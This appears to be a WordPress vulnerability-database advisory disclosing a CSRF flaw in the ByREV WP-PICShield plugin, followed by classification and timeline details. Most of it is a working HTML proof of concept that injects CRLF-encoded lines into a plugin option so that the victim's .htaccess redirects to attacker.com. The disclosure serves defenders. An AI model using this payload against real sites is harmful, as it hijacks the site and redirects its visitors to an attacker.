ByREV WP-PICShield - Cross-Site Request Forgery (CSRF)



Description
The ByREV WP-PICShield WordPress plugin is vulnerable to CSRF.

When updating the plugin options, several parameters in the issued POST request are written directly to the .htaccess file within the WordPress root directory. An attacker may be able to insert arbitrary lines into the .htaccess file, reconfiguring it to redirect to another website or other malicious actions.

While all plugin options can be updated by an attacker via CSRF, the following parameter values are directly inserted into .htaccess:
byhln[gtfo_key]
byhln[images_extension]
byhln[allowed_domains]
byhln[allowed_user_agents]
byhln[allowed_remote_ip]

The attached PoC demonstrates a CSRF payload which rewrites the victim's .htaccess file to redirect to an attacker-controlled website.
Proof of Concept
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://target.com/wordpress/wp-admin/options-general.php?page=byrev_picshield_admin" method="POST">
      <input type="hidden" name="byhln&#95;hidden" value="Y" />
      <input type="hidden" name="byhln&#91;wp&#45;picshield&#45;version&#93;" value="1&#46;9&#46;7" />
      <input type="hidden" name="byhln&#91;enable&#95;hotlink&#95;gtfo&#93;" value="1" />
      <input type="hidden" name="byhln&#91;gtfo&#95;key&#93;" value="csrf&#13;&#10;Redirect&#32;301&#32;&#47;&#32;http&#58;&#47;&#47;attacker&#46;com&#47;&#13;&#10;&#35;" />
      <input type="hidden" name="byhln&#91;hotlink&#95;cache&#95;folder&#93;" value="&#126;hotlink&#45;cache" />
      <input type="hidden" name="byhln&#91;image&#95;source&#95;transparency&#93;" value="65" />
      <input type="hidden" name="byhln&#91;watermark&#95;enabled&#93;" value="1" />
      <input type="hidden" name="byhln&#91;watermark&#95;pass&#95;through&#93;" value="1" />
      <input type="hidden" name="byhln&#91;watermark&#95;png&#95;file&#93;" value="watermark&#46;png" />
      <input type="hidden" name="byhln&#91;watermark&#95;position&#93;" value="0" />
      <input type="hidden" name="byhln&#91;blend&#95;bar&#95;watermark&#93;" value="1" />
      <input type="hidden" name="byhln&#91;blend&#95;bar&#95;opacity&#93;" value="25" />
      <input type="hidden" name="byhln&#91;write&#95;host&#95;source&#93;" value="1" />
      <input type="hidden" name="byhln&#91;write&#95;time&#95;cached&#95;over&#95;image&#93;" value="0" />
      <input type="hidden" name="byhln&#91;print&#95;qr&#95;host&#93;" value="0" />
      <input type="hidden" name="byhln&#91;send&#95;hotlink&#95;gtfo&#95;header&#95;signature&#93;" value="0" />
      <input type="hidden" name="byhln&#91;redirect&#95;direct&#95;link&#95;images&#95;from&#95;google&#93;" value="1" />
      <input type="hidden" name="byhln&#91;redirect&#95;404&#95;not&#95;found&#95;image&#93;" value="&#47;image&#45;not&#45;found&#47;" />
      <input type="hidden" name="byhln&#91;redirect&#95;not&#95;found&#95;image&#95;code&#93;" value="404&#32;Not&#32;Found" />
      <input type="hidden" name="byhln&#91;maximum&#95;megapixels&#95;size&#93;" value="3" />
      <input type="hidden" name="byhln&#91;images&#95;extension&#93;" value="jpg&#32;jpeg&#32;png&#32;gif" />
      <input type="hidden" name="byhln&#91;allowed&#95;domains&#93;" value="www&#46;zjulian&#46;com" />
      <input type="hidden" name="byhln&#91;allowed&#95;user&#95;agents&#93;" value="googlebot&#13;&#10;msnbot&#13;&#10;baiduspider&#13;&#10;slurp&#13;&#10;webcrawler&#13;&#10;teoma&#13;&#10;photon" />
      <input type="hidden" name="byhln&#91;allowed&#95;remote&#95;ip&#93;" value="" />
      <input type="hidden" name="byhln&#91;allow&#95;online&#95;translators&#93;" value="1" />
      <input type="hidden" name="byhln&#91;allow&#95;socials&#93;" value="1" />
      <input type="hidden" name="byhln&#91;x&#95;frame&#95;sameorgin&#93;" value="0" />
      <input type="hidden" name="byhln&#91;log&#95;referer&#95;enabled&#93;" value="0" />
      <input type="hidden" name="byhln&#91;log&#95;referer&#95;table&#93;" value="&#42;&#42;&#32;disabled&#32;&#42;&#42;" />
      <input type="hidden" name="byhln&#91;write&#95;credit&#95;plugin&#93;" value="1" />
      <input type="hidden" name="Submit" value="Update&#32;Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Submitter Zachary Julian
Submitter Website http://www.zjulian.com/
Submitter Twitter @tprime_
Views 5193
Verified No
WPVDB ID 8738

Timeline

Publicly Published 2017-01-04 (almost 3 years ago)
Added 2017-02-22 (over 2 years ago)
Last Updated 2019-08-05 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin